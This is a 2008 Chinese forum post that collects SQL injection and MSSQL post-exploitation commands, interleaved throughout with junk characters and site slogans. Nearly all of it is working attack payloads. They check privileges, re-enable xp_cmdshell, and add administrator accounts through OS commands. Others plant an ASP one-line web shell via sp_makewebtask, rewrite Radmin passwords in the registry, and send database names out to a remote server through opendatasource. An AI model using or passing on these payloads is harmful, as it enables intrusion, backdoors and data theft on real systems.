 UID: 22465
 精华: 0
 积分: 534
 帖子: 96
 威望: 22
金钱: 554 D币
宣传币: 0 X币
踢楼币: 0 T币
 经验: 01级
 阅读权限: 50
 注册: 2008-5-10
状态:
|
荣誉勋章
|
楼主
大 中
小 发表于 2008-6-26 21:13 只看该作者
阿D常用注入命令收集整理
常用的注入代码 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站6 E, W; k" W7 ]! n$ W4 _
, y0 {) L: n5 O. R打造最好的电脑自学交流论坛//看看是什么权限的 打造最好的电脑自学交流论坛 j0 ~" h% F, n8 Q# Y6 n
and 1=(Select IS_MEMBER('db_owner')) 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站3 ]! Y6 e4 P$ r# R( [( |) p" D
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站* I, P* F" ]7 J; d6 k( l: k# s- O5 e
$ w/ ~ A% t9 A: L# Y, ~
//检测是否有读取某数据库的权限
% `8 i3 m+ |" }& Y8 \打造最好的电脑自学交流论坛and 1= (Select HAS_DBACCESS('master'))
+ [% T- o0 q+ \/ Z2 bwww.520diannao.comAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- 我爱电脑技术论坛# D, a) U, y* q3 ?7 }3 @5 |& H
我爱电脑技术论坛: t7 u1 N; E3 w5 H& [
www.520diannao.com. c A4 v, l! D% w; F
数字类型 4 G8 l: Q9 N1 _" k
and char(124)%2Buser%2Bchar(124)=0 我爱电脑技术论坛+ Q# m3 W- L& c9 p9 y- C: f3 N
打造最好的电脑自学交流论坛( F3 P5 U9 N, Y4 G5 Q/ P( J
字符类型 ) s( n0 {4 C" |+ r1 Z3 J3 L3 |' W
' and char(124)%2Buser%2Bchar(124)=0 and ''='
8 _3 q+ ~' [: {7 W& [1 A' U电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
) k! C8 d7 k* f. l打造最好的电脑自学交流论坛搜索类型 我爱电脑技术论坛- c# U7 W `) v7 T/ c# N/ R
' and char(124)%2Buser%2Bchar(124)=0 and '%'=' / N/ Y) n0 e% {( n- z+ t* b
我爱电脑技术论坛9 r( a. l0 j8 X" r
爆用户名
( x6 L% ?- k* _+ i电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站 and user>0 4 N i! W1 l0 `
' and user>0 and ''=' 我爱电脑技术论坛9 r7 i/ f# R/ r; C& V$ S
! _9 [/ R: y2 d) f" X电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站检测是否为SA权限 我爱电脑技术论坛, n L6 h5 f+ e; n, A- f
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
1 Q x% o$ j s. t4 K3 l我爱电脑技术论坛And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 -- ' Z2 g0 K7 d9 o' h
打造最好的电脑自学交流论坛/ A3 o/ X0 E4 i
检测是不是MSSQL数据库
6 Y( ]) \+ O2 a: e( H打造最好的电脑自学交流论坛and exists (select * from sysobjects);--
' y# S5 ~' [9 O" ]% j8 F我爱电脑技术社区--打造最好的电脑技术自学交流平台打造最好的电脑自学交流论坛! D7 B$ _, d, Y) [
检测是否支持多行 www.520diannao.com- X# }$ Z3 G; p- _% E
;declare @d int;--
2 Y( J. _2 I/ n# D$ D" g9 B电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站www.520diannao.com& a6 i O- t" j# r/ [* t& d
恢复 xp_cmdshell - ~, J/ J7 z* m. C7 l1 D0 @( s3 u
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';-- 我爱电脑技术论坛: p2 N- u& C1 a6 T& c- N
打造最好的电脑自学交流论坛* n$ b! r+ {/ c. ?' d1 |7 l
3 N- }; ~$ `6 `
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
4 s" a4 |: C/ m电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站打造最好的电脑自学交流论坛& z3 @; m* j: c! j& J2 U2 [
//----------------------- 打造最好的电脑自学交流论坛# s0 s( v' \3 o: _+ h+ u+ Y8 z
// 执行命令
& a3 U; n' L# \3 W% W( w8 mwww.520diannao.com//----------------------- 打造最好的电脑自学交流论坛 g' p7 f. ? t! c* n5 ?# A$ e1 A
首先开启沙盘模式: 我爱电脑技术社区--打造最好的电脑技术自学交流平台: I! l2 ]& p4 U9 \3 F
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 ' |4 `; M' c9 T, m/ b- m) |
我爱电脑技术社区--打造最好的电脑技术自学交流平台: o* \4 D! q7 b) R! Y- M3 k, O
然后利用jet.oledb执行系统命令
6 y$ b# u4 U& b1 J8 D I! Lwww.520diannao.comselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
/ ], C( M# v# |( A0 J$ g我爱电脑技术社区--打造最好的电脑技术自学交流平台我爱电脑技术论坛7 y" z' y! w2 t
执行命令
( \( C, q/ h) Q7 M0 i- d* v+ v" Y打造最好的电脑自学交流论坛;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
6 Y' N' @, L: m" N+ I; {电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
0 P& V' T5 d$ c; m. ~* D打造最好的电脑自学交流论坛EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
- }8 m% C2 e' {& Y$ Y电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
- \7 W5 J! |4 d3 W( cwww.520diannao.com判断xp_cmdshell扩展存储过程是否存在: 我爱电脑技术社区--打造最好的电脑技术自学交流平台* B- Z1 A( g1 I Q' }9 ]
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
; n6 U1 n4 E$ [8 t1 Y7 C; B9 V
# ?4 L& k7 V0 |! P3 y6 @我爱电脑技术论坛写注册表 我爱电脑技术社区--打造最好的电脑技术自学交流平台5 k( ~* m$ @1 }) I# g
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 打造最好的电脑自学交流论坛# p/ ]* j/ _- t$ L/ m, z& ?. P
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站& ?& [: P( X; t5 d* \
REG_SZ . |$ C, k, @* E1 Z
& A; A& V2 }% Iwww.520diannao.com读注册表 我爱电脑技术社区--打造最好的电脑技术自学交流平台3 c9 a9 _+ A6 |5 M" {7 q* b
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit' 我爱电脑技术社区--打造最好的电脑技术自学交流平台 c) |+ H# B: ?# Y- ~) o# F# W7 I
7 w5 L5 W/ L D0 |/ H* U. x电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站读取目录内容
2 w) `( g9 I( @& R; O打造最好的电脑自学交流论坛exec master..xp_dirtree 'c:\winnt\system32\',1,1 $ g5 ~4 T1 ~3 Q K, d; z
6 P4 Y; T" B o3 v- H1 u% Z
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站& V) j. v* J5 _: d& Y6 j
数据库备份 我爱电脑技术社区--打造最好的电脑技术自学交流平台( Q+ h" a y8 | J
backup database pubs to disk = 'c:\123.bak'
! t. C$ Y6 [+ W+ D0 u# j. g& v' A( s电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站* N+ N; n/ k6 Q7 N
//爆出长度 www.520diannao.com# A! s6 w, ?" O) H% g: y6 }0 l# N
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
. h1 @) _7 R+ P
3 @) G9 r d* H, c0 Y我爱电脑技术论坛
2 m u8 \& Y: @打造最好的电脑自学交流论坛更改sa口令方法:用sql综合利用工具连接后,执行命令: 我爱电脑技术社区--打造最好的电脑技术自学交流平台, Y+ Q% o" z Q# }2 F
exec sp_password NULL,'新密码','sa' 打造最好的电脑自学交流论坛( F- K3 y9 t- v1 G4 j% y
我爱电脑技术社区--打造最好的电脑技术自学交流平台* O/ I( Y/ h0 o" I( I# @6 W
添加和删除一个SA权限的用户test:
' g1 y5 H) ?5 a8 c9 E5 X$ Uexec master.dbo.sp_addlogin test,ptlove 打造最好的电脑自学交流论坛! h' p. k& j* w
exec master.dbo.sp_addsrvrolemember test,sysadmin
6 F4 A! ^8 F- ?7 ^, D电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
$ m) H3 B9 {1 b8 R8 E6 h" ~电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站删除扩展存储过过程xp_cmdshell的语句: www.520diannao.com" C" c1 N0 E4 Q5 u& z/ ]0 s: G
exec sp_dropextendedproc 'xp_cmdshell' 我爱电脑技术论坛 u( ^ b9 `! |' C9 }' t5 t
6 \! _) [( ~% u我爱电脑技术论坛添加扩展存储过过程
; y, J# }/ ?% o, ~www.520diannao.comEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' 2 @; o# |# \- g8 I8 t F
GRANT exec On xp_proxiedadata TO public
# f1 a0 W2 H v* K0 Q' W电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
+ K0 Z: _ l4 A( ]- @
2 B- J7 [1 l: _& J! L# G: H3 \我爱电脑技术论坛停掉或激活某个服务。 我爱电脑技术论坛0 | P; i2 g# d5 E9 m
; `: \# J# v7 w我爱电脑技术论坛exec master..xp_servicecontrol 'stop','schedule' www.520diannao.com4 q; P# T) O1 k+ M+ G* ^1 h: w6 l: E
exec master..xp_servicecontrol 'start','schedule' 打造最好的电脑自学交流论坛" }- K' F$ `' s/ G
; O4 W% D0 T$ r' \我爱电脑技术论坛dbo.xp_subdirs ! g9 I1 S7 S; s. r. P
9 l0 ]6 Z) \; Y$ h2 |. P
8 V! j" V* K% B/ u) ]. X/ c我爱电脑技术社区--打造最好的电脑技术自学交流平台只列某个目录下的子目录。
% v) h, O8 t" g0 o我爱电脑技术论坛xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp' 我爱电脑技术社区--打造最好的电脑技术自学交流平台+ l ?: ?0 r" s9 d) Y
www.520diannao.com# I! P5 C6 c! ^+ |& D
dbo.xp_makecab
2 x G. e( H5 w: W我爱电脑技术论坛我爱电脑技术论坛2 `* y: i0 X; o
将目标多个档案压缩到某个目标档案之内。 www.520diannao.com' U1 y( H! v! C, W7 H
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。 我爱电脑技术论坛- E4 ~+ ?* u W7 I* }
* d. F2 i$ ^# }: O* w: ~我爱电脑技术论坛dbo.xp_makecab
: R. Q7 {$ p7 E4 i# Bwww.520diannao.com'c:\test.cab','mszip',1,
8 {( E$ |: l9 h6 y4 Z5 Awww.520diannao.com'C:\Inetpub\wwwroot\SQLInject\login.asp', 7 I# a1 o/ W, T$ m5 n+ K+ A$ w/ K
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp' / \: l0 ?, k: Q+ M# i. l
我爱电脑技术论坛2 ?2 Y2 x$ [, L2 z1 o% `( _! ]. ^
xp_terminate_process 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站7 v8 x5 U* X; u& a- @
打造最好的电脑自学交流论坛* C( l+ v0 S5 L, Q- ` |
停掉某个执行中的程序,但赋予的参数是 Process ID。
9 _3 ]) _& E4 L) b v3 d. `利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
+ A/ ^9 ~( k! n1 l0 Cwww.520diannao.com我爱电脑技术论坛 P. n: q" R- v7 N
xp_terminate_process 2484 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站9 [! i% y7 z( S- H1 i
我爱电脑技术社区--打造最好的电脑技术自学交流平台# Z; J; X6 d+ }1 T/ u
xp_unpackcab 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站9 w& s" ~4 w( g5 o9 }2 ]+ P0 {
5 h4 u9 I6 Z8 {# ?5 Y电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站解开压缩档。
) N5 V' L1 s) d9 @' U9 D; Z我爱电脑技术社区--打造最好的电脑技术自学交流平台
0 G/ X" |) D( f& }5 B; Z我爱电脑技术社区--打造最好的电脑技术自学交流平台xp_unpackcab 'c:\test.cab','c:\temp',1
+ R0 a' ~1 o! A7 ` z电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
! E, K5 u; I& Q2 |www.520diannao.com我爱电脑技术社区--打造最好的电脑技术自学交流平台3 l: P$ y5 ^3 u
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
+ q1 g# y5 u7 N; O" y. J/ C电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
/ z' J* K$ x+ n" L4 p& O+ w我爱电脑技术社区--打造最好的电脑技术自学交流平台create database lcx;
f7 \3 {$ n* t0 ^电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站Create TABLE ku(name nvarchar(256) null); 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站8 }- D- p P7 w7 o, C
Create TABLE biao(id int NULL,name nvarchar(256) null);
9 O9 H) m% c$ M" ~+ o+ b我爱电脑技术论坛www.520diannao.com$ y+ i" ^8 Q3 f& e4 u
//得到数据库名 www.520diannao.com' m; w% N" O6 r* k5 v- ^5 r
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
% f' `- {$ A# z' J k+ ?$ v0 s% ^* t打造最好的电脑自学交流论坛
; \+ T2 q- V( K6 T9 O" t3 w; S我爱电脑技术论坛
" S: }) n& }7 F. R电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站//在Master中创建表,看看权限怎样
0 r+ e) e& ^2 x- X/ NCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);-- 我爱电脑技术论坛* z8 o' @) d7 o- z. v
. F* `( n0 N7 O我爱电脑技术社区--打造最好的电脑技术自学交流平台用 sp_makewebtask直接在web目录里写入一句话马:
- z; P" w' L8 Q8 Z1 b; q打造最好的电脑自学交流论坛http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
( ]( x4 Q8 f7 f$ s- R* t4 Iwww.520diannao.com+ M- c: e% r- r. }
//更新表内容
( Q0 |& H7 V5 s, V/ R3 t( o电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站Update films SET kind = 'Dramatic' Where id = 123
! \7 T3 Y& B& ^www.520diannao.com打造最好的电脑自学交流论坛7 k6 Q) T: \/ a( j# i
//删除内容 我爱电脑技术论坛7 C7 U5 s) |- F+ E# D6 T$ u F
delete from table_name where Stockid = 3
|
